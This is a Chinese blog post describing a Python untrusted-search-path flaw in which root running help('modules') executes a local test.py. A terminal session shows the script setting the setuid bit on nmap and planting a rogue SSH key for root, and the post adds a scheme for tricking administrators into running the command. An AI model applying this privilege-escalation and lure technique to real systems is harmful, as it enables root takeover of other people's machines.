exploit-db.com近日爆了一个奇特的漏洞。只要诱使root在当前目录,通过python或者python-wrapper执行一下help(‘modules’)命令,后台就以root权限执行该目录下test.py脚本。
///adalia是普通用户,以下显示test.py的权限和脚本内容。脚本内容其中一项是chmod 4755 /usr/bin/nmap,把nmap加为4755权限,这意味着以执行nmap时以nmap的owner权限执行,即普通用户可以用root权限执行nmap

///以下所示nmap本来的权限为rwx,
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
///攻击前 /root/.ssh/authorized_keys不存在
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory

///攻击开始:以bukkit(root权限)执行python

adalia@bukkit:~/security/pythonwrapper> su
Password: 
bukkit:/home/adalia/security/pythonwrapper # python
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')
Please wait a moment while I gather a list of all available modules...
...此处省略具体模块...
>>> exit() 

///经过一番modules的列举后在看看情况nmap的权限已经变成rws了。也即可以以nmap的owen权限执行。而原本不存在的/root/.ssh/authorized_keys的文件也有了。

bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.4M Oct 29  2011 /usr/bin/nmap
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
ssh-rsa rogueclown washere

漏洞发现者还提供了一种诱使管理员运行 help(‘modules’)的场景,在webhosting环境下,向管理员反应某些模块运行有问题,要求管理帮忙调试一把,列出webhosting环境里安装了那些模块。于是管理员等到该用户目录下,一跑起 help(‘modules’)就悲剧了。
受影响:
Version: python 2.7.2 and python 3.2.1
Python untrusted search path/code execution vulnerability:
http://www.exploit-id.com/local-exploits/python-untrusted-search-pathcode-execution-vulnerability
python-wrapper untrusted search path/code execution vulnerability:
http://www.exploit-db.com/exploits/19523/

源链接

Hacking more

...